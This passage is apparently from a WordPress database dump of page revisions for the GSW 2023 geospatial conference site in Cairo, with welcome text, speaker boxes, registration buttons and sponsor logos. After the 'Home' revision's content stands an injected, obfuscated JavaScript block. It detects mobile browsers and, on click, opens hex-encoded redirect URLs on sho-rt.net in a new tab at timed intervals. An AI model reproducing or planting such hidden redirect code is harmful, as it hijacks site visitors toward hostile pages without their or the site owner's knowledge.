width=\"2/3\"][vc_raw_html]JTNDcCUyMHN0eWxlJTNEJTIydGV4dC1hbGlnbiUzQWp1c3RpZnklM0IlMjBjb2xvciUzQWJsYWNrJTNCJTIyJTNFQXMlMjB3ZSUyMGNlbGVicmF0ZSUyMG91ciUyMDUwdGglMjBhbm5pdmVyc2FyeSUyQyUyMHRoZSUyMEFyYWIlMjBBY2FkZW15JTIwZm9yJTIwU2NpZW5jZSUyQyUyMFRlY2hub2xvZ3klMkMlMjBhbmQlMjBNYXJpdGltZSUyMFRyYW5zcG9ydCUyMCUyOEFBU1RNVCUyOSUyMGlzJTIwaG9ub3JlZCUyMHRvJTIwaG9zdCUyMHRoZSUyMElTUFJTJTIwZmlyc3QlMjBHZW9zcGF0aWFsJTIwV2VlayUyMGluJTIwQWZyaWNhJTIwYW5kJTIwTWlkZGxlJTIwRWFzdCUyMGluJTIwMjAyMyUyMCUyOEdTVy0yMDIzJTI5JTIwdGhhdCUyMHdpbGwlMjBiZSUyMGhlbGQlMjB1bmRlciUyMHRoZSUyMGF1c3BpY2VzJTIwb2YlMjBILkUlMjBTZWNyZXRhcnktR2VuZXJhbCUyMG9mJTIwdGhlJTIwTGVhZ3VlJTIwb2YlMjBBcmFiJTIwU3RhdGVzLiUyMFRoZSUyMGNvbmZlcmVuY2UlMjB3aWxsJTIwYmUlMjBoZWxkJTIwaW4lMjBTZXB0ZW1iZXIlMjAyMDIzJTJDJTIwYXQlMjB0aGUlMjBJbnRlckNvbnRpbmVudGFsJTIwQ2Fpcm8lMjBDaXR5JTIwc3RhcnMlMjBDYWlybyUyQyUyMEVneXB0LiUyMEFBU1RNVCUyMHN0cm9uZ2x5JTIwYmVsaWV2ZXMlMjB0aGF0JTIwc2NpZW5jZSUyMGlzJTIwdGhlJTIwa2V5JTIwdG8lMjB0aGUlMjBmdXR1cmUlMjBhbmQlMjB0aGUlMjBjb3JuZXJzdG9uZSUyMGZvciUyMG5hdGlvbnMlMjclMjBwcm9ncmVzcyUyMGFuZCUyMHByb3NwZXJpdHkuJTIwSXQlMjBpcyUyMHRoZSUyMHByaW1hcnklMjBmYWN0b3IlMjBmb3IlMjBodW1hbiUyMGFjaGlldmVtZW50cyUyMHRocm91Z2hvdXQlMjBhbGwlMjBhZ2VzLiUyMEFBU1RNVCUyMGhhcyUyMGElMjBob3N0JTIwb2YlMjBxdWFsaWZpZWQlMjBwcm9mZXNzb3JzJTIwYW5kJTIwZXhwZXJ0cyUyMHdobyUyMGFyZSUyMGNhcGFibGUlMjBvZiUyMHN1cHBvcnRpbmclMjBBcmFiJTIwYW5kJTIwQWZyaWNhbiUyMGNvdW50cmllcyUyMGluJTIwdmFyaW91cyUyMHNjaWVudGlmaWMlMjBmaWVsZHMuJTIwVGhlJTIwR1NXJTIwd2lsbCUyMHByb3ZpZGUlMjBhJTIwcGxhdGZvcm0lMjBmb3IlMjBpbnRlcm5hdGlvbmFsJTIwc2Nob2xhcnMlMkMlMjBncmFkdWF0ZSUyMHN0dWRlbnRzJTJDJTIwZnV0dXJlJTIwc2NpZW50aXN0cyUyMGFuZCUyMGluZHVzdHJpYWwlMjBzZWN0b3JzJTIwdG8lMjBsZWFybiUyMGV4Y2hhbmdlJTIwa25vd2xlZGdlJTIwYW5kJTIwZXhwZXJpZW5jZXMlMjBvZiUyMGFwcGx5aW5nJTIwZ2Vvc3BhdGlhbCUyMHRlY2hub2xvZ2llcyUyMGZvciUyMHN1c3RhaW5hYmxlJTIwZGV2ZWxvcG1lbnQlMjBmb3IlMjBiZXR0ZXIlMjBxdWFsaXR5JTIwb2YlMjBsaWZlJTIwZm9yJTIwcGVvcGxlJTIwYXJvdW5kJTIwdGhlJTIwd29ybGQuJTIwV2UlMjB3b3VsZCUyMGxpa2UlMjB0byUyMHRha2UlMjB0aGlzJTIwb3Bwb3J0dW5pdHklMjB0byUyMHdlbGNvbWUlMjB5b3UlMjB0byUyMENhaXJvJTIwYSUyMHZpYnJhbnQlMkMlMjBleGhpbGFyYXRpbmclMkMlMjBleG90aWMlMkMlMjBmYXNjaW5hdGluZyUyMGFuZCUyMHdlbGNvbWluZyUyMGNpdHkuJTIwSG9tZSUyMHRvJTIwdGhlJTIwYmVzdCUyMFBoYXJhb25pYyUyQyUyMENvcHRpYyUyMGFuZCUyMElzbGFtaWMlMjBzaWdodHMlMjBpbiUyMEVneXB0LiUyMENhaXJvJTIwaXMlMjB3aGVyZSUyMHlvdSUyMG5ldmVyJTIwa25vdyUyMHdoYXQlMjBpbmNyZWRpYmxlJTJDJTIwaGFsZi1mb3Jnb3R0ZW4lMjBtb251bWVudCUyMHlvdSUyMG1pZ2h0JTIwc3R1bWJsZSUyMGFjcm9zcyUyMHdoaWxlJTIwd2FuZGVyaW5nJTIwYXJvdW5kLiUyMEVuam95JTIwdGhlJTIwTmlsZSUyMHZpZXclMkMlMjB2aXNpdCUyMHRoZSUyMGdyZWF0JTIwcHlyYW1pZHMlMjBvZiUyMEdpemElMkMlMjB3YWxrJTIwdGhyb3VnaCUyMHRoZSUyMGNhcGl0YWwlMjdzJTIwbWVkaWV2YWwlMjBtYXJrZXRzJTIwYnklMjBLaGFuJTIwRWwtS2hhbGlsaSUyQyUyMG9yJTIwd2FsayUyMGRvd24lMjB0aGUlMjBOaWxlJTIwcHJvbWVuYWRlLiUyMFdlJTIwbG9vayUyMGZvcndhcmQlMjB0byUyMHdvcmtpbmclMjB3aXRoJTIwdGhlJTIwSVNQUlMlMjBjb3VuY2lsJTJDJTIwY29tbWlzc2lvbnMlMjBwcmVzaWRlbnRzJTJDJTIwd29ya2luZyUyMGdyb3VwJTIwb2ZmaWNlcnMlMkMlMjBhbmQlMjBvdGhlciUyMHNpc3RlciUyMG9yZ2FuaXphdGlvbnMlMjB0byUyMGhhdmUlMjBhJTIwc3VjY2Vzc2Z1bCUyMHRlY2huaWNhbCUyMHByb2dyYW0lMjBhbmQlMjBhJTIwbWVtb3JhYmxlJTIwc29jaWFsJTIwcHJvZ3JhbS4lMjBJdCUyMGlzJTIwZ3JlYXQlMjB0byUyMGhhdmUlMjB0aGUlMjBHU1clMjBjb21pbmclMjB0byUyMEVneXB0JTIwd2hlcmUlMjBtb3N0JTIwcHJvYmFibHklMjB0aGUlMjBmaXJzdCUyMG1hcHBpbmclMjBzeXN0ZW1zJTIwd2VyZSUyMGRldmVsb3BlZCUyMDEwMDBzJTIweWVhcnMlMjBhZ28uJTIwV2VsY29tZSUyMHRvJTIwR1NXJTI3MjAyMyUyMGluJTIwQ2Fpcm8lMkMlMjBFZ3lwdC4lM0MlMkZwJTNF[/vc_raw_html][/vc_column][vc_column width=\"1/3\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2271|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-ismael-1.png|caption^null|alt^null|title^dr-ismael|description^null\" img_width=\"100\" title=\"Prof. Ismail AbdelGhafar\" heading_tag=\"h5\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]\r\n<h6><strong>President Arab Academy for Science, Technology and Maritime Transport</strong></h6>\r\n[/bsf-info-box][bsf-info-box icon_type=\"custom\" icon_img=\"id^2272|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-naser.jpg|caption^null|alt^null|title^dr-naser|description^null\" img_width=\"100\" icon_style=\"advanced\" icon_border_spacing=\"100\" title=\"Prof. Naser El-Sheimy\" heading_tag=\"h5\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]\r\n<h6>Geospatial Week Director ,The University of Calgary</h6>\r\n[/bsf-info-box][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^1900|url^https://gsw2023.com/wp-content/uploads/2018/06/trade10.jpg|caption^null|alt^null|title^trade10|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"white\" style=\"shadow\" border_width=\"10\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#311b92\" tick_col=\"#ffffff\" tick_sep_col=\"#eeee22\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#eeee22\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\" dt_text_icon_title=\"\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home','','inherit','closed','closed','','3063-revision-v1','','','2023-06-25 15:40:37','2023-06-25 15:40:37','',3063,'https://gsw2023.com/?p=4815',0,'revision','',0),
(4816,4,'2023-06-25 15:42:09','2023-06-25 15:42:09','[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219449581{margin-top: 100px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219262706{margin-top: 100px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\r\n&nbsp;\r\n\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219711400{margin-top: 90px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096263968{margin-top: 0px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\r\n<a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]\r\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]\r\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\r\n<span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345447550{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n<a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" />\r\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345389553{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"> </a></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345510625{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: 